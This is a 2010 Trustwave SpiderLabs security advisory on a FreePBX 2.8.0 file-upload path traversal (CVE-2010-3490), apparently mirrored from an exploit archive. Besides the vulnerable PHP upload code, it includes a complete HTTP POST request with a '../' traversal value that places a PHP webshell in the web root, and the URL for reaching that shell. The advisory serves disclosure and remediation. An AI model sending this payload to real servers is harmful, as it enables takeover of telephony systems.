Skip to content
cyberexploits
webappphptext

FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution

FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution

Published on 2010-09-24

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/15098.txt7eac4c3a
raw
Trustwave's SpiderLabs Security Advisory TWSL2010-005:

FreePBX recordings interface allows remote code execution



https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt



Published: 2010-09-23

Version: 1.0



Vendor: FreePBX (http://www.freepbx.org/)

Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc) using it

Version(s) affected: 2.8.0 and below



Product Description:

FreePBX is an easy to use GUI (graphical user interface) that controls and

manages Asterisk, the world's most popular open source telephony engine

software. FreePBX has been developed and hardened by thousands of

volunteers,has been downloaded over 5,000,000 times, and is utilized in an

estimated 500,000 active phone systems.



Source: http://www.freepbx.org

Credit: Wendel G. Henrique of Trustwave's SpiderLabs



CVE: CVE-2010-3490



Finding:

The configuration interface for FreePBX is prone to a remote arbitrary code

execution on the system recordings menu. FreePBX doesn't handle file uploads

in a secure manner, allowing an attacker to manipulate the file extension

and the beginning of the uploaded file name.



The piece of code below, found in page.recordings.php, illustrates part of

the recordings upload feature.



/* Code removed to fit better on advisory */



<?php

  if (isset($_FILES['ivrfile']['tmp_name']) &&

  is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {

    if (empty($usersnum)) {

      $dest = "unnumbered-";

    } else {

      $dest = "{$usersnum}-";

    }

    $suffix = substr(strrchr($_FILES['ivrfile']['name'], "."), 1);

    $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;

    move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);

    echo "<h6>"._("Successfully uploaded")."

      ".$_FILES['ivrfile']['name']."</h6>";

    $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');

  } ?>



/* Code removed to fit better on advisory */



When a file is uploaded, a copy is saved temporarily under the /tmp/

directory, where the name of the file is composed of

user-controlled-staticname.extension, where:



"user-controlled" is $usersnum variable.

"staticname" value is -ivrrecording.

"extension" is controlled by the user.



If $usersnum variable is not defined, then a static string (unnumbered)

is used.



Finally, when the user clicks on the save button on the System Recordings

interface, the file is saved with the original file name provided by the

user under the /var/lib/asterisk/sounds/custom/ directory.



When uploading a file, an attacker can manipulate the $usersnum variable to

perform a path traversal attack and save it anyplace that the web server

user has access, for example the Apache's DocumentRoot. This allows an

attacker to upload malicious code to the web server and execute it under the

webserver's access permissions.



The HTTP request below illustrates the upload of a phpshell.



POST /admin/config.php HTTP/1.1

Host: 10.10.1.3

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;

en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive

Referer: http://10.10.1.3/admin/config.php

Cookie: ARI=cookieValue; PHPSESSID=cookieValue

Authorization: Basic base64auth

Content-Type: multipart/form-data;

boundary=---------------------------5991806838789183981588991120

Content-Length: 116089



-----------------------------5991806838789183981588991120

Content-Disposition: form-data; name="display"



recordings

-----------------------------5991806838789183981588991120

Content-Disposition: form-data; name="action"



recordings_start

-----------------------------5991806838789183981588991120

Content-Disposition: form-data; name="usersnum"



../../../../../var/www/html/admin/SpiderLabs

-----------------------------5991806838789183981588991120

Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"

Content-Type: application/octet-stream



<?php

/* WebShell code goes here */

?>



-----------------------------5991806838789183981588991120--



To access the webshell in this example, an attacker would use

the following path: http://10.10.1.3/admin/SpiderLabs-ivrrecording.php



Maintainer Response:

The maintainer has released a patch to address this issue for all versions

of the software 2.3 and newer.



Details of the patch can be found here:

http://www.freepbx.org/trac/ticket/4553



Remediation Steps: 

Install the maintainer-provided patch.



Vendor Communication Timeline:

08/13/10 - Initial contact

08/18/10 - Vulnerability disclosed

09/16/10 - Initial fix proposed by maintainer

09/22/10 - Fix reviewed, improved, and released by maintainer

09/23/10 - Advisory public release



Revision History: 

1.0 Initial publication



About Trustwave:

Trustwave is the leading provider of on-demand and subscription-based

information security and payment card industry compliance management

solutions to businesses and government entities throughout the world. For

organizations faced with today's challenging data security and compliance

environment, Trustwave provides a unique approach with comprehensive

solutions that include its flagship TrustKeeper compliance management

software and other proprietary security solutions. Trustwave has helped

thousands of organizations--ranging from Fortune 500 businesses and large

financial institutions to small and medium-sized retailers--manage

compliance and secure their network infrastructure, data communications and

critical information assets. Trustwave is headquartered in Chicago with

offices throughout North America, South America, Europe, Africa, China and

Australia. For more information, visit https://www.trustwave.com



About Trustwave's SpiderLabs:

SpiderLabs is the advance security team at Trustwave responsible for

incident response and forensics, ethical hacking and application security

tests for Trustwave's clients. SpiderLabs has responded to hundreds of

security incidents, performed thousands of ethical hacking exercises and

tested the security of hundreds of business applications for Fortune 500

organizations. For more information visit

https://www.trustwave.com/spiderlabs



Disclaimer:

The information provided in this advisory is provided "as is" without

warranty of any kind. Trustwave disclaims all warranties, either express or

implied, including the warranties of merchantability and fitness for a

particular purpose. In no event shall Trustwave or its suppliers be liable

for any damages whatsoever including direct, indirect, incidental,

consequential, loss of business profits or special damages, even if

Trustwave or its suppliers have been advised of the possibility of such

damages. Some states do not allow the exclusion or limitation of liability

for consequential or incidental damages so the foregoing limitation may not

apply.

View on GitHub